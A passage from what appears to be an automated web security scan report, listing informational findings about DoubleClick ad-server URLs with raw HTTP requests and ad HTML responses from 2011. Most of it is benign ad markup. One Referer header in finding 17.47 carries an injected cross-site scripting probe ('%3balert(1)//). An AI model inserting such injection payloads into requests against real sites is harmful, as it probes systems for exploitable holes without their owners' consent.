23045&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=2623045&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.43. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225
http://s0.2mdn.net/2782903/Q1_Battery_Cont728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950191/cstr=54754277=_4d437608,7338583388,766161_950191_1183_0,1_/xsxdata=$XSXDATA/bnum=54754277/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1681620464/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1681620464? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:06:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshack.lenmar.com/RS/"><img src="http://s0.2mdn.net/2782903/Q1_Battery_Cont728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;39969225&migRandom=5658295&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=39969225"></script>
...[SNIP]...

17.44. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000753542/mnum=0000950191/cstr=12039847=_4d433bcb,8413765675,753542_950191_81_0,1_/xsxdata=$XSXDATA/bnum=12039847/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=169827066?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=4958576&migTrackFmtExt=client;io;ad;crtv

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5216
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:37 GMT
Expires: Sat, 29 Jan 2011 01:54:37 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
58576&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=4958576&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.45. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5128597.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740
http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=7048951&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000950192/cstr=50344343=_4d437b72,5284078472,766161_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=50344343/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/22038498/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=22038498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:29:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5218

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
48951&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.radioshack.com/uc/index.jsp?page=researchLibraryArticle&articleUrl=../graphics/uc/rsk/USContent/HTML/pages/q1wireless.html&noBc=true"><img src="http://s0.2mdn.net/2782903/EVO_Shift_4G728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;58087454;234178444;40401740&migRandom=7048951&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740"></script>
...[SNIP]...

17.46. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470?\

The response contains the following links to other domains:

http://s0.2mdn.net/1295336/Adobe_DVSwitcher_MercEngine_728x90_img.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6223
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:39:39 GMT
Expires: Fri, 28 Jan 2011 16:39:39 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
AUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/premiere/switch/?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_DVSwitcher_MercEngine_728x90_img.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

17.47. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4270.Tribal_Fusion/B5094437.2

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470?

The response contains the following links to other domains:

http://s0.2mdn.net/1295336/Adobe_CS5_DPTruerEdge_728x90_img.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4270.Tribal_Fusion/B5094437.2;sz=728x90;click=http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/;ord=1115025470? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Fri, 28 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6204

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
YQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/http://www.adobe.com/products/creativesuite/design?sdid=IEFXL"><img src="http://s0.2mdn.net/1295336/Adobe_CS5_DPTruerEdge_728x90_img.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.48. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.5

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5;sz=160x600;;sz=160x600;ord=106131971?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095575.198102272/267856416/direct/01%3fhref=

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1323822/Mens_Rollback_160x600.gif

Request

GET /adi/N4319.MSNMEN/B3889285.5;sz=160x600;;sz=160x600;ord=106131971?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095575.198102272/267856416/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856416/direct;wi.160;hi.600/01/0.7152271461673081?click=http://yads.zedo.com/ads2/c%3Fa=883600%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 13:39:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/w;234512153;0-0;0;58327305;2321-160/600;40019819/40037606/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_160x600.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.49. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.6

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=164770402?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095574.198102269/267856421/direct/01%3fhref=

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=164770402?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095574.198102269/267856421/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856421/direct;wi.728;hi.90/01/0.9115818275604397?click=http://yads.zedo.com/ads2/c%3Fa=883605%3Bn=826%3Bx=3613%3Bc=826000187,826000187%3Bg=172%3Bi=15%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=15%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=15%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:23:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 503

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/n;234512155;0-0;0;58327313;3454-728/90;40019815/40037602/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.50. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.MSNMEN/B3889285.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7;sz=300x250;;sz=300x250;ord=180294417?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095571.198102267/267856417/direct/01%3fhref=

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1323822/Mens_Rollback_300x250.gif

Request

GET /adi/N4319.MSNMEN/B3889285.7;sz=300x250;;sz=300x250;ord=180294417?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/198095571.198102267/267856417/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856417/direct;wi.300;hi.250/01/0.9525772058404982?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 14:31:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 505

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/e;234512143;0-0;0;58327315;4307-300/250;40019928/40037715/2;u=INmz6woBADYAAHrQ5V4AAACH~010411;~sscs=%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29574&rURL=/mennoofferweb"><img src="http://s0.2mdn.net/viewad/1323822/Mens_Rollback_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.51. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4319.msn/B2087123.382

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=113577767?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/196247635.198101849/267856420/direct/01%3fhref=

The response contains the following links to other domains:

http://s0.2mdn.net/1323822/2-Womens_Rollback_300x250.gif
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N4319.msn/B2087123.382;sz=300x250;;sz=300x250;ord=113577767?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=http://clk.redcated/goiframe/196247635.198101849/267856420/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/0.9113153473008424?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 02:35:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4717

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
0%3B58334028%3B4307-300/250%3B39877283/39895070/1%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B%7Esscs%3D%3fhttp://www.nutrisystem.com/jsps_hmr/tracking/click.jsp?iid=29572&rURL=/webnoweeksoffernetworks"><img src="http://s0.2mdn.net/1323822/2-Womens_Rollback_300x250.gif" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.52. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2388325/PBK_300x250_GearSale_WD111.jpg

Request

